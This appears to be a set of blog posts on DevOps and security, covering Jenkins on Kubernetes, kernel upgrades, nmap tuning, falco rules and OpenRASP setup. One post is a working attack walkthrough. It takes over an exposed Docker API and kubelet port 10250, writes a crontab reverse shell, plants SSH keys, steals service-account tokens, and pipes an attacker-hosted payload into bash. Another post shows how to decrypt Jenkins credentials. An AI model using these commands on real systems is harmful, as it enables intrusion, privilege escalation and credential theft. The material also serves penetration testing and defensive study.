              value: -Duser.timezone=Asia/Shanghai -Xmx$(LIMITS_MEMORY)m -XshowSettings:vm -Dhudson.slaves.NodeProvisioner.initialDelay=0 -Dhudson.slaves.NodeProvisioner.MARGIN=50 -Dhudson.slaves.NodeProvisioner.MARGIN0=0.85
          volumeMounts:
            - name: jenkins-home
              mountPath: /var/jenkins_home
          livenessProbe:
            httpGet:
              path: /login
              port: 8080
            initialDelaySeconds: 60
            timeoutSeconds: 5
            failureThreshold: 12 # ~2 minutes
          readinessProbe:
            httpGet:
              path: /login
              port: 8080
            initialDelaySeconds: 60
            timeoutSeconds: 5
            failureThreshold: 12 # ~2 minutes
      volumes:
      - name: jenkins-home
        persistentVolumeClaim:
          claimName: jenkins-home
      securityContext:
        fsGroup: 1000

jenkins-svc.yaml

---
apiVersion: v1
kind: Service
metadata:
  name: jenkins
spec:
  type: NodePort
  selector:
    name: jenkins
  ports:
  - name: web
    port: 8080
    targetPort: web
  - name: agent
    port: 50000
    targetPort: agent

Apply all the YAML files

kubectl create -f nfs-client-deployment.yaml
kubectl create -f nfs-client-class.yaml
kubectl create -f jenkins-rbac.yaml
kubectl create -f jenkins-pvc.yaml
kubectl create -f jenkins-statefulset.yaml
kubectl create -f jenkins-svc.yaml

Accessing Jenkins

Open Jenkins at http://192.168.1.68:31669/ in a browser and log in with the initial password taken from the logs

# kubectl get svc|grep jenkins
jenkins      NodePort    10.100.221.153   <none>        8080:31669/TCP,50000:31011/TCP  
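One way to fish out the initial admin password (the StatefulSet above is named jenkins, so its first pod is jenkins-0; the path is the standard Jenkins location):

# kubectl exec jenkins-0 -- cat /var/jenkins_home/secrets/initialAdminPassword
# kubectl logs jenkins-0 | less   # the same password is also printed between rows of asterisks on first start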

Running Docker inside Jenkins

This uses the Docker-in-Docker approach: the host's docker.sock is mapped into the pod. Note that the image must contain the Docker client; zj1244/jenkins_with_docker:v1 is used here.

Dockerfile contents:

FROM jenkins/jenkins:latest
MAINTAINER [email protected]
USER root

# Install the latest Docker CE binaries
RUN apt-get update && \
    apt-get -y install apt-transport-https \
      ca-certificates \
      curl \
      gnupg2 \
      software-properties-common && \
    curl -fsSL https://download.docker.com/linux/$(. /etc/os-release; echo "$ID")/gpg > /tmp/dkey; apt-key add /tmp/dkey && \
    add-apt-repository \
      "deb [arch=amd64] https://download.docker.com/linux/$(. /etc/os-release; echo "$ID") \
      $(lsb_release -cs) \
      stable" && \
   apt-get update && \
   apt-get -y install docker-ce

Add the socket mapping in jenkins-statefulset.yaml:

# StatefulSet
---
apiVersion: apps/v1beta1
kind: StatefulSet
metadata:
  name: jenkins
  labels:
    name: jenkins
spec:
  serviceName: jenkins
  replicas: 1
  updateStrategy:
    type: RollingUpdate
  template:
    metadata:
      name: jenkins
      labels:
        name: jenkins
    spec:
      terminationGracePeriodSeconds: 10
      serviceAccountName: jenkins
      containers:
        - name: jenkins
          image: zj1244/jenkins_with_docker:v1
          imagePullPolicy: Always
          ports:
            - containerPort: 8080
              name: web
              protocol: TCP
            - containerPort: 50000
              name: agent
              protocol: TCP
          resources:
            limits:
              cpu: 1
              memory: 1Gi
            requests:
              cpu: 0.5
              memory: 500Mi
          env:
            - name: LIMITS_MEMORY
              valueFrom:
                resourceFieldRef:
                  resource: limits.memory
                  divisor: 1Mi
            - name: JAVA_OPTS
              # value: -XX:+UnlockExperimentalVMOptions -XX:+UseCGroupMemoryLimitForHeap -XX:MaxRAMFraction=1 -XshowSettings:vm -Dhudson.slaves.NodeProvisioner.initialDelay=0 -Dhudson.slaves.NodeProvisioner.MARGIN=50 -Dhudson.slaves.NodeProvisioner.MARGIN0=0.85
              value: -Duser.timezone=Asia/Shanghai -Xmx$(LIMITS_MEMORY)m -XshowSettings:vm -Dhudson.slaves.NodeProvisioner.initialDelay=0 -Dhudson.slaves.NodeProvisioner.MARGIN=50 -Dhudson.slaves.NodeProvisioner.MARGIN0=0.85
          volumeMounts:
            - name: jenkins-home
              mountPath: /var/jenkins_home
            - name: dockersock
              mountPath: /var/run/docker.sock
          livenessProbe:
            httpGet:
              path: /login
              port: 8080
            initialDelaySeconds: 60
            timeoutSeconds: 5
            failureThreshold: 12 # ~2 minutes
          readinessProbe:
            httpGet:
              path: /login
              port: 8080
            initialDelaySeconds: 60
            timeoutSeconds: 5
            failureThreshold: 12 # ~2 minutes
      volumes:
      - name: jenkins-home
        persistentVolumeClaim:
          claimName: jenkins-home
      - name: dockersock
        hostPath:
          path: /var/run/docker.sock
      securityContext:
        fsGroup: 1000

Then update the pod

# kubectl apply -f jenkins-statefulset.yaml

Reference:
https://hyrepo.com/tech/kubernetes-jenkins/#Docker-in-Docker

Decrypting Jenkins credentials

Prerequisite

The ability to run scripts in the Script Console

Obtain the encrypted credential

View the encrypted value via Credentials -> System -> Global credentials -> the credential -> Update
image

Decrypt

Open Manage Jenkins -> Script Console and run the following code to reveal the password

println(hudson.util.Secret.fromString('xxxxxxxxxxxxxxxxxxxx').getPlainText())

or

println(hudson.util.Secret.decrypt("xxxxxxxxxxxxxxx"))

image

Reference:
https://fortynorthsecurity.com/blog/the-security-of-devsecops-jenkins/

How to upgrade the CentOS kernel to a specific version

  1. Check which kernel versions are currently installed:
rpm -qa|grep -i kernel-3.10

image

  2. Search for and download three packages named like the following:
    kernel-3.10.0-229.el7.x86_64.rpm
    kernel-tools-3.10.0-229.el7.x86_64.rpm
    kernel-tools-libs-3.10.0-229.el7.x86_64.rpm

  3. Install the three packages one by one:

yum install kernel-tools-3.10.0-229.el7.x86_64.rpm

If the installation fails, force-install with rpm:

rpm -ivh --force kernel-tools-3.10.0-229.el7.x86_64.rpm

Then check whether the installation succeeded:
image

  4. Download and install the matching kernel-devel package to avoid kernel build errors:
yum install kernel-devel-3.10.0-229.el7.x86_64.rpm
  5. Reboot and check that the upgrade took effect
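A sketch of verifying the result after the reboot and, if the old kernel still boots by default, selecting the new entry in GRUB (standard CentOS 7 commands on a BIOS install; paths differ under UEFI):

uname -r                                                      # should now print 3.10.0-229.el7.x86_64
awk -F\' '/^menuentry /{print i++ " : " $2}' /etc/grub2.cfg   # list the boot entries
grub2-set-default 0                                           # set the index of the new kernel as default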

Shortening nmap scan time

The earlier masscan+nmap approach missed too many findings, so the question became: is a pure nmap scan fast enough to be usable?

First, a baseline: scanning one /24 (192.168.1.1-192.168.1.255) across ports 1-65535 with masscan+nmap takes roughly 22 minutes:
image

Next, scanning a single IP with the following options takes about 89 seconds:
nmap -sV 192.168.xxx.31 -p1-65535
image
image

Now add -T4 and see whether the speed changes:
image

Still about 89 seconds. Next, also add --version-intensity 4:
image

The time drops to about 43 seconds, but the trade-off is that some services are no longer fingerprinted, as shown below:
image

This means working out which protocols were missed and patching them by hand. First, look up rmiregistry in /usr/share/nmap/nmap-service-probes and change its rarity value to 4.
image

Some fingerprints, however, have no rarity entry there, e.g. jdwp:
image

In that case, run grep -r "Java Debug Wire Protocol" /usr/share/nmap/ to find which file holds the rarity logic; it turns out to be /usr/share/nmap/scripts/jdwp-version.nse. Change the value there to 4 and the service is detected even with --version-intensity 4.
image
image

With these changes in place, a pure nmap scan takes about 7 minutes:
image
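Putting the options together, the final scan command looks something like this (target range and output prefix are placeholders):

nmap -sV -T4 --version-intensity 4 -p1-65535 192.168.1.0/24 -oA scan_result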

A pitfall when using apscheduler

Background

apscheduler + flask had been running scheduled jobs without trouble for a while, until one day the jobs had simply disappeared, which was very puzzling.

Cause

After adding a lot of logging, the following error turned up:

[2019-12-12 Thursday 15:00] [INFO] Scheduler started
[2019-12-12 Thursday 15:00] [DEBUG] Looking for jobs to run
[2019-12-12 Thursday 15:00] [ERROR] Unable to restore job "test_job" -- removing it
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/site-packages/apscheduler/jobstores/mongodb.py", line 128, in _get_jobs
    jobs.append(self._reconstitute_job(document['job_state']))
  File "/usr/local/lib/python2.7/site-packages/apscheduler/jobstores/mongodb.py", line 117, in _reconstitute_job
    job.__setstate__(job_state)
  File "/usr/local/lib/python2.7/site-packages/apscheduler/job.py", line 272, in __setstate__
    self.func = ref_to_obj(self.func_ref)
  File "/usr/local/lib/python2.7/site-packages/apscheduler/util.py", line 305, in ref_to_obj
    raise LookupError('Error resolving reference %s: could not import module' % ref)
LookupError: Error resolving reference jobs:job1: could not import module
[2019-12-12 Thursday 15:00] [DEBUG] Next wakeup is due at 2019-12-13 08:21:05.380000+08:00 (in 62419.929130 seconds)
[2019-12-12 Thursday 15:00] [INFO]  * Running on http://0.0.0.0:8088/ (Press CTRL+C to quit)

The error shows that the job could not be restored, so apscheduler removed it. But why did restoring fail? The job was right there in the database, along with jobs added by other programs through apscheduler. The debug output then revealed something odd: the database held job 1, added by program A and due at time a1, and job 2, added by program B and due at time b2, yet program A's debug output showed time b2. The likely explanation is that job 1 and job 2 live in the same collection of the same database, so program A loaded job 2, could not import its function reference, and deleted the job.

Fix

None of the tutorials or Q&A posts online mention this situation, and the examples never show customizing the job store's database or collection, which is why one program using apscheduler works fine but two programs break. The fix is simply to give each program its own collection, as shown here:
image

How to upgrade Ubuntu to a specific kernel version

When installing yulong earlier, the driver had to be recompiled for each kernel version. Online download pages for CentOS and Ubuntu, however, only list release versions, so how do you get from a release version to the exact kernel you need? Taking Ubuntu as an example, suppose the goal is an environment running kernel 4.4.0-134-generic. First:

1. Look up the mapping between releases and kernel versions on the wiki; kernel 4.4 corresponds to 16.04 LTS
image

2. Some older releases are no longer on the main site, so download the matching version from Old Ubuntu Releases and install it
image

3. After installation, the kernel turns out to be 4.4.0-116-generic
image

4. That is not yet the required 4.4.0-134-generic, so upgrade to the specific kernel by installing the package:

apt-get install -y linux-image-4.4.0-134-generic

Then reboot and, once past the BIOS screen, press Esc to choose the kernel to boot (tip: after typing apt-get install -y linux-image-4, press Tab repeatedly to see which kernel versions are available)
image

5. Finally install the matching headers, which are needed when compiling drivers

apt-get install linux-headers-$(uname -r)

6. Summary: to install a specific kernel version, first install the release whose major.minor kernel number matches, then use apt-get to upgrade to the exact kernel. apt-get cannot jump across major versions: to get 4.4.0-134-generic, installing an image whose kernel is 4.2 will not let you go from 4.2 to 4.4. Part of what was said earlier was wrong; the right approach is to search for the exact kernel string, work out from the results which release it belongs to, then download that release and install the kernel via apt
image

Deploying falco with helm

Deployment

Deploy falco with helm; formatting the logs as JSON is recommended because the entries carry more detail

# helm install --name falco --set ebpf.enabled=true,falco.jsonOutput=true,image.tag=0.22.0 stable/falco

Removing it from the cluster

# helm delete --purge falco

A CrashLoopBackOff here may mean the kernel does not match:
image

Check the logs to confirm whether it is a kernel problem:
image

After upgrading the kernel on the affected node and rebooting, the problem is resolved:

yum install kernel
yum -y install kernel-devel-$(uname -r)

image

Using custom rules

# cat custom_rules.yaml 
customRules:
  custom_rules.yaml: |- 
    - rule: Unauthorized process
      desc: There is a running process not described in the base template
      condition: spawned_process and container and proc.args contains "serviceaccount"
      output: Unauthorized process (%proc.cmdline) running in (%container.id)
      priority: ERROR
      tags: [process]
    - list: safe_etc_dirs
      items: [/etc/titanagent]
# helm upgrade falco -f custom_rules.yaml stable/falco

The logs show that the custom rules have been loaded

image
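One way to check the same thing from the command line (the app=falco label is assumed from the stable/falco chart's defaults):

# kubectl logs -l app=falco --tail=200 | grep -i "loading rules"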

Removing false positives

Log analysis turned up the false positive below; here is how to adjust the rules to suppress it

20:46:45.519621929: Warning Sensitive file opened for reading by non-trusted program (user=<NA> program=titanagent command=titanagent -d file=/etc/shadow parent=<NA> gparent=<NA> ggparent=<NA> gggparent=<NA> container_id=host image=<NA>) k8s.ns=<NA> k8s.pod=<NA> container=host k8s.ns=<NA> k8s.pod=<NA> container=host k8s.ns=<NA> k8s.pod=<NA> container=host

Locate the rule

Pick a keyword from the alert, e.g. non-trusted, and search falco's rule file falco_rules.yaml to see how the rule is written. It is this one:

- rule: Read sensitive file untrusted
  desc: >
    an attempt to read any sensitive file (e.g. files containing user/password/authentication
    information). Exceptions are made for known trusted programs.
  condition: >
    sensitive_files and open_read
    and proc_name_exists
    and not proc.name in (user_mgmt_binaries, userexec_binaries, package_mgmt_binaries,
     cron_binaries, read_sensitive_file_binaries, shell_binaries, hids_binaries,
     vpn_binaries, mail_config_binaries, nomachine_binaries, sshkit_script_binaries,
     in.proftpd, mandb, salt-minion, postgres_mgmt_binaries)
    and not cmp_cp_by_passwd
    and not ansible_running_python
    and not proc.cmdline contains /usr/bin/mandb
    and not run_by_qualys
    and not run_by_chef
    and not run_by_google_accounts_daemon
    and not user_read_sensitive_file_conditions
    and not perl_running_plesk
    and not perl_running_updmap
    and not veritas_driver_script
    and not perl_running_centrifydc
    and not runuser_reading_pam
  output: >
    Sensitive file opened for reading by non-trusted program (user=%user.name program=%proc.name
    command=%proc.cmdline file=%fd.name parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] container_id=%container.id image=%container.image.repository)
  priority: WARNING
  tags: [filesystem, mitre_credential_access, mitre_discovery]

Analyze the rule

With the rule found, look for something in the alert that is unique enough to whitelist, e.g. program=titanagent. Since program=%proc.name, examine how the rule uses proc.name:

not proc.name in (user_mgmt_binaries, userexec_binaries, package_mgmt_binaries,
     cron_binaries, read_sensitive_file_binaries, shell_binaries, hids_binaries,
     vpn_binaries, mail_config_binaries, nomachine_binaries, sshkit_script_binaries,
     in.proftpd, mandb, salt-minion, postgres_mgmt_binaries)

Roughly, this clause fires when proc.name is not in the list in parentheses, so it is enough to add titanagent to that list. The entries in parentheses are list variables, so pick a suitable one to extend, e.g. hids_binaries. Searching falco_rules.yaml for hids_binaries gives its definition:

- list: hids_binaries
  items: [aide]

Add the rule

Finally, add the following to our custom_rules.yaml:

customRules:
  custom_rules.yaml: |- 
    - rule: Unauthorized process
      desc: There is a running process not described in the base template!!!!!!!!!!!!!!!!!!!!
      condition: spawned_process and container and proc.args contains "serviceaccount"
      output: Unauthorized process (%proc.cmdline) running in (%container.id)
      priority: ERROR
      tags: [process]
    - list: safe_etc_dirs
      append: true
      items: [/etc/titanagent]
    - list: hids_binaries
      append: true
      items: [titanagent]

Reference:
https://hub.helm.sh/charts/stable/falco/1.0.10

Deploying Baidu IAST

Environment requirements

Three data stores are needed: MySQL, Elasticsearch and MongoDB. ES stores alerts and statistics; Mongo stores applications, accounts and passwords, and so on.
The current database requirements are:

  • MongoDB 3.6 or later
  • Elasticsearch 5.6 or later, but below 7.0

Create the Mongo user

Installing MongoDB and ES is not covered here; for testing, Docker is fine (see the sketch below)

> use openrasp
> db.createUser({user:'iast',pwd:'123456', roles:["readWrite", "dbAdmin"]})
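Since Docker is acceptable for a test setup, the two stores can be brought up along these lines (image tags chosen to satisfy the version requirements above; this is a sketch, not part of the original walkthrough):

docker run -d --name mongo -p 27017:27017 mongo:3.6
docker run -d --name es -p 9200:9200 -p 9300:9300 elasticsearch:5.6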

Install the management console

# wget https://packages.baidu.com/app/openrasp/release/1.3.2/rasp-cloud.tar.gz
# tar -zxvf rasp-cloud.tar.gz
# cd rasp-cloud-2020-03-25/
# vim conf/app.conf

Edit the MongoDB and ES connection settings in app.conf
image

Finally, start the service:

# ./rasp-cloud

or

# ./rasp-cloud -d // run in the background

Install the IAST scanner

# wget https://packages.baidu.com/app/openrasp/openrasp-iast-latest -O /usr/bin/openrasp-iast

Configure MySQL: create a database named openrasp and grant access to 'rasp'@'%'. The example password here is rasp123; replace it with a strong one. Connect to MySQL as root and run:

DROP DATABASE IF EXISTS openrasp;
CREATE DATABASE openrasp default charset utf8mb4 COLLATE utf8mb4_general_ci;
grant all privileges on openrasp.* to 'rasp'@'%' identified by 'rasp123';
grant all privileges on openrasp.* to 'rasp'@'localhost' identified by 'rasp123';

Click Application Management -> Add, enter iast as both the application name and the note, choose java as the language, and save
image

In the cloud console (the one on port 8086), click Add Host -> Fuzz tool installation in the upper right and follow it from step 3 onward; remember to change the MySQL address:
image

Configure the management console

Open the cloud console at http://ip:8086 and log in with the default credentials openrasp / admin@123.
In plugin management, push the iast plugin.
image

Then, under Protection Settings -> Fuzz server address, enter the URL that openrasp-iast listens on. Keep the default port, but be sure to change the IP, otherwise scan tasks will never be discovered:
image

Finally, under System Settings -> General Settings, adjust the detection configuration

  • Set the maximum execution time of a single hook point to 5000
  • Turn off the file filter option "do not call the detection plugin when the file does not exist"
  • Set the LRU size to 0
    Then click Save

Install the agent

Download the webgoat.jar file
Link: https://pan.baidu.com/s/1du-4XVlAfvk7S6q-8VF7gA
Extraction code: 4261

Create a Dockerfile

# cat Dockerfile
FROM openjdk:11.0.1-jre-slim-stretch

ARG webgoat_version=v8.0.0-SNAPSHOT

RUN \
  apt-get update && apt-get install && \
  useradd --home-dir /home/webgoat --create-home -U webgoat
ADD https://packages.baidu.com/app/openrasp/release/1.3.2/rasp-java.tar.gz /tmp
RUN cd /tmp \
    && tar -xf rasp-java.tar.* \
    && mv rasp-*/rasp/ /rasp/ \
    && rm -f rasp-java.tar.gz

RUN echo "cloud.enable: true" >> /rasp/conf/openrasp.yml \
    && echo "cloud.backend_url: http://192.168.47.105:8086/" >> /rasp/conf/openrasp.yml \
    && echo "cloud.app_id: cbaf06097b812f6b6c3ad3269812b2f01f3efb50" >> /rasp/conf/openrasp.yml \
    && echo "cloud.app_secret: 45BvWs0K3vZ0iW10Fm52BD1DcPe4ElIn38e3s6JdxE8" >> /rasp/conf/openrasp.yml

COPY webgoat-server-8.0.0.M25.jar /home/webgoat/webgoat.jar
RUN mkdir -p /rasp/logs/rasp/
EXPOSE 8080

ENTRYPOINT ["java", "--add-opens","java.base/jdk.internal.loader=ALL-UNNAMED","-Djava.security.egd=file:/dev/./urandom","-javaagent:/rasp/rasp.jar", "-jar", "/home/webgoat/webgoat.jar"]
CMD ["--server.port=8080", "--server.address=0.0.0.0"]

Build and run the image

# docker build -t webgoat:1 .
# docker run -p 8080:8080 webgoat:1

Test the result

In the cloud console, click Host Management; the agent showing up there means it was deployed successfully
image

Visit http://ip:8080/WebGoat and exercise a few features; you can see that vulnerabilities have already been detected
image

From an unauthenticated Docker API to access on the Kubernetes master

Exploiting the unauthenticated Docker API

Nothing special here; it is very similar to exploiting an exposed Redis

  • Method 1
# docker  -H tcp://ip:2375 run -it -v /etc:/mnt centos /bin/bash
# cp /mnt/crontab /mnt/crontab.bak
# echo -e "* * * * * root bash -i >& /dev/tcp/172.1.1.1/8008 0>&1\n" >> /mnt/crontab
  • Method 2
# docker -H tcp://ip:2375 run -it -v /root/.ssh/:/mnt centos /bin/bash
# ssh-keygen -t rsa -P '' // the attacker generates a key pair locally
# echo "xxxx" >> /mnt/authorized_keys // write the public key onto the remote Docker host
# ssh ip // connect

Check whether the host is a Kubernetes node

  • First check whether it is a Kubernetes master
# docker -H 1.1.1.1 ps| grep apiserver
  • After getting a reverse shell, check whether the host is a Kubernetes node
# netstat -an | grep 6443 // look for connections to 6443, which also reveals the master's IP
# ps -ef  | grep kubelet // check whether kubelet is running

Copy the configuration files

Locate the kubelet.conf file

image

Copy the contents of /etc/kubernetes/kubelet.conf, together with the .pem file it references. If the user is default-auth, the permissions will not be very broad

image

That gives the required files: kubelet.conf plus the kubelet-client-current.pem it points to, which serves below as both the client certificate and the client key.

Connect to the remote 6443

# cat hacker.conf 
apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    server: https://k8s-nginx-01.xxx.cloud:6443  // change this to the master you want to reach
  name: default-cluster
contexts:
- context:
    cluster: default-cluster
    namespace: default
    user: default-auth
  name: default-context
current-context: default-context
kind: Config
preferences: {}
users:
- name: default-auth
  user:
    client-certificate: client.pem
    client-key: client.pem

# kubectl --kubeconfig hacker.conf get pods
NAME          READY   STATUS             RESTARTS   AGE
lxcfs-qhxqt   0/1     CrashLoopBackOff   11725      41d

This turns out not to be much use: the user's privileges are too low and only a few commands are allowed

image

A different angle

Enter any pod and look at its token

image

Then try connecting with kubectl --insecure-skip-tls-verify=true --server="https://192.168.1.1:6443" --token="eyJ....." get secrets --all-namespaces; still not enough permissions

image
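A convenient way to see exactly what a given credential may do is kubectl's built-in permission listing (available in reasonably recent kubectl versions); a sketch using the config and token from above:

# kubectl --kubeconfig hacker.conf auth can-i --list
# kubectl --insecure-skip-tls-verify=true --server="https://192.168.1.1:6443" --token="eyJ....." auth can-i --list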

After a series of attempts, the pod k8s_agent_cattle-node-agent-fbgcq_cattle-system turned out to have fairly broad permissions. The next step is to create a pod that mounts a host directory and then use crontab to get a shell
image

Attacking the Kubernetes kubelet port 10250

1. Check whether the host is exploitable: browse to https://ip:10250/pods; data like the following means it is:
image
2. Run curl -k -XPOST "https://k8s-node-1:10250/run/%namespace%/%pod_name%/%container_name%" -d "cmd=ls -la /" to execute commands:
image
3. The question now is how to determine namespace, pod_name and container_name. Browse to https://ip:10250/pods and look for selfLink; it holds a value like /api/v1/namespaces/test1/pods/web-docker-594dd9789f-fc9d9, where the namespace is test1 and the pod is web-docker-594dd9789f-fc9d9. If execution fails, check whether the pod's phase is failed; if so, pick another pod whose phase is running.
image
4. Get a token: curl -k -XPOST "https://ip:10250/run/cattle-system/cattle-cluster-agent-549fc45d6f-lf7hp/cluster-register" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"
image
image
5. If the token is not at that path, use the mount command to find it:
image
6. Next, try to gain access to the master (API server). By default the API server listens on 6443, so scan the same subnet for hosts with 6443 open and try them one by one. Alternatively, run env and look for the API server address or other sensitive information:
image
7. Run kubectl --insecure-skip-tls-verify=true --server="https://ip:6443" --token="eyJhbG......" get secrets --all-namespaces -o json; if it returns error: You must be logged in to the server (Unauthorized), the token does not match that API server.
image

Gaining access to the master

1. Get a shell on the node (the host with 10250 open):
192.168.84.158:88 is the attacker's web server, which serves a reverse-shell payload:
image

curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://192.168.4.68:10250/exec/ingress-nginx/nginx-ingress-controller-6f5cbc5444-nkdg6/nginx-ingress-controller?command=/bin/bash&command=-c&command=curl+192.168.84.158:88+|+bash&input=1&output=1&tty=1"
If that does not work, try this instead:
curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://192.168.4.68:10250/exec/ingress-nginx/nginx-ingress-controller-6f5cbc5444-nkdg6/nginx-ingress-controller?command=/bin/sh&command=-c&command=curl+192.168.84.158:88+|+sh&input=1&output=1&tty=1"
image

[root@localhost ~]# curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://192.168.4.68:10250/exec/ingress-nginx/nginx-ingress-controller-6f5cbc5444-nkdg6/nginx-ingress-controller?command=/bin/bash&command=-c&command=curl+192.168.84.158:88+|+bash&input=1&output=1&tty=1"
* About to connect() to 192.168.4.68 port 10250 (#0)
*   Trying 192.168.4.68...
* Connected to 192.168.4.68 (192.168.4.68) port 10250 (#0)
* Initializing NSS with certpath: sql:/etc/pki/nssdb
* skipping SSL peer certificate verification
* SSL connection using TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
* Server certificate:
* 	subject: CN=192.168.4.68@1544518989
* 	start date: Dec 11 09:03:09 2018 GMT
* 	expire date: Dec 11 09:03:09 2019 GMT
* 	common name: 192.168.4.68@1544518989
* 	issuer: CN=192.168.4.68@1544518989
> POST /exec/ingress-nginx/nginx-ingress-controller-6f5cbc5444-nkdg6/nginx-ingress-controller?command=/bin/bash&command=-c&command=curl+192.168.84.158:88+|+bash&input=1&output=1&tty=1 HTTP/1.1
> User-Agent: curl/7.29.0
> Host: 192.168.4.68:10250
> Accept: */*
> X-Stream-Protocol-Version: v2.channel.k8s.io
> X-Stream-Protocol-Version: channel.k8s.io
> 
< HTTP/1.1 302 Found
< Location: /cri/exec/zEKYcaZt  // fetch the execution result from this path
< Date: Wed, 07 Aug 2019 06:01:42 GMT
< Content-Length: 0
< Content-Type: text/plain; charset=utf-8
< 
* Connection #0 to host 192.168.4.68 left intact
[root@localhost ~]# 

2. Test whether the token can reach the master
On a machine with Docker installed, run:
[root@localhost ~]# docker run -it --rm joshgubler/wscat -c "https://192.168.4.68:10250/cri/exec/zEKYcaZt" --no-check
image
In the reverse shell, look up the master's internal IP and check whether a token is present:
image
Run the following and see whether it errors out

[root@localhost ~]# TOKEN_VALUE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
[root@localhost ~]# curl -k --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt -H  "Authorization: Bearer $TOKEN_VALUE" https://10.0.0.1:443/api/v1/pods

3. Create a pod that can spawn a reverse shell (a sketch follows below)
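The original stops at this step; a minimal sketch of what it could look like, reusing the hostPath-mount idea from the first post (the API server address and $TOKEN_VALUE come from the checks above; the image is arbitrary):

cat <<'EOF' > revpod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: revpod
spec:
  containers:
  - name: revpod
    image: nginx
    volumeMounts:
    - mountPath: /mnt
      name: host-root
  volumes:
  - name: host-root
    hostPath:
      path: /
EOF
kubectl --insecure-skip-tls-verify=true --server="https://10.0.0.1:443" --token="$TOKEN_VALUE" apply -f revpod.yaml
# then write a reverse-shell entry into /mnt/etc/crontab exactly as in the first post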

References:
https://www.lijiaocn.com/%E9%97%AE%E9%A2%98/2018/07/20/kubernetes-docker-cpu-high.html
https://segmentfault.com/a/1190000002937665
http://blog.allen-mo.com/2019/04/29/k8s-security-serviceaccount/
https://stackoverflow.com/questions/51176283/how-to-create-pod-from-rest-api
https://raesene.github.io/blog/2016/10/08/Kubernetes-From-Container-To-Cluster/
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet/

Installing single-node Kubernetes on CentOS 7

[root@localhost ~]# hostnamectl set-hostname  k8s-master
[root@k8s-master ~]# reboot
[root@k8s-master ~]# yum -y install policycoreutils-python*
[root@k8s-master ~]# wget http://ftp.riken.jp/Linux/cern/centos/7/extras/x86_64/Packages/container-selinux-2.68-1.el7.noarch.rpm
[root@k8s-master ~]# rpm -ivh container-selinux-2.68-1.el7.noarch.rpm
Preparing...                       ################################# [100%]
Updating / installing...
   1:container-selinux-2:2.68-1.el7   ################################# [100%]
[root@k8s-master ~]# yum install -y libltdl.so* pigz* bridge-utils*
[root@k8s-master ~]# curl -sSL https://get.docker.com/ | sudo sh
[root@k8s-master ~]# vim /etc/yum.repos.d/kubernetes.repo
[root@k8s-master ~]# cat /etc/yum.repos.d/kubernetes.repo
[kubernetes]
name=Kubernetes
baseurl=http://mirrors.aliyun.com/kubernetes/yum/repos/kubernetes-el7-x86_64
enabled=1
gpgcheck=0
repo_gpgcheck=0
gpgkey=http://mirrors.aliyun.com/kubernetes/yum/doc/yum-key.gpg
        http://mirrors.aliyun.com/kubernetes/yum/doc/rpm-package-key.gpg

[root@k8s-master ~]# yum makecache
[root@k8s-master ~]# swapoff -a
[root@k8s-master ~]# sed -i '/ swap / s/^\(.*\)$/#\1/g' /etc/fstab
[root@k8s-master ~]# echo "net.bridge.bridge-nf-call-iptables=1">> /etc/sysctl.conf
[root@k8s-master ~]# echo "1" > /proc/sys/net/ipv4/ip_forward
[root@k8s-master ~]# modprobe br_netfilter
[root@k8s-master ~]# sysctl -p
[root@k8s-master ~]# yum install -y kubelet kubeadm kubectl kubernetes-cni
[root@k8s-master ~]# systemctl enable docker && systemctl start docker
Created symlink from /etc/systemd/system/multi-user.target.wants/docker.service to /usr/lib/systemd/system/docker.service.
[root@k8s-master ~]# systemctl enable kubelet && systemctl start kubelet
Created symlink from /etc/systemd/system/multi-user.target.wants/kubelet.service to /usr/lib/systemd/system/kubelet.service.
[root@k8s-master ~]# 
[root@k8s-master ~]# kubeadm config images list  // list the required images, then pull the matching versions
W0802 14:50:44.611344    1866 version.go:98] could not fetch a Kubernetes version from the internet: unable to get URL "https://dl.k8s.io/release/stable-1.txt": Get https://dl.k8s.io/release/stable-1.txt: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers)
W0802 14:50:44.611436    1866 version.go:99] falling back to the local client version: v1.15.1
k8s.gcr.io/kube-apiserver:v1.15.1
k8s.gcr.io/kube-controller-manager:v1.15.1
k8s.gcr.io/kube-scheduler:v1.15.1
k8s.gcr.io/kube-proxy:v1.15.1
k8s.gcr.io/pause:3.1
k8s.gcr.io/etcd:3.3.10
k8s.gcr.io/coredns:1.3.1
[root@k8s-master ~]# docker pull k8s.gcr.io/kube-apiserver:v1.15.1 && docker pull k8s.gcr.io/kube-controller-manager:v1.15.1 && docker pull k8s.gcr.io/kube-scheduler:v1.15.1 && docker pull k8s.gcr.io/kube-proxy:v1.15.1 && docker pull k8s.gcr.io/pause:3.1 && docker pull k8s.gcr.io/etcd:3.3.10 && docker pull k8s.gcr.io/coredns:1.3.1
[root@k8s-master ~]# kubeadm init   --pod-network-cidr=10.244.0.0/16
[root@k8s-master ~]# mkdir -p $HOME/.kube
[root@k8s-master ~]# cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
[root@k8s-master ~]# chown $(id -u):$(id -g) $HOME/.kube/config
[root@k8s-master ~]# kubectl taint nodes --all node-role.kubernetes.io/master-  // the master does not schedule workloads by default; remove the taint to allow it
node/k8s-master untainted
[root@k8s-master ~]# docker pull quay.io/coreos/flannel:v0.10.0-amd64  // install the CNI network plugin
v0.10.0-amd64: Pulling from coreos/flannel
ff3a5c916c92: Pull complete 
8a8433d1d437: Pull complete 
306dc0ee491a: Pull complete 
856cbd0b7b9c: Pull complete 
af6d1e4decc6: Pull complete 
Digest: sha256:88f2b4d96fae34bfff3d46293f7f18d1f9f3ca026b4a4d288f28347fcb6580ac
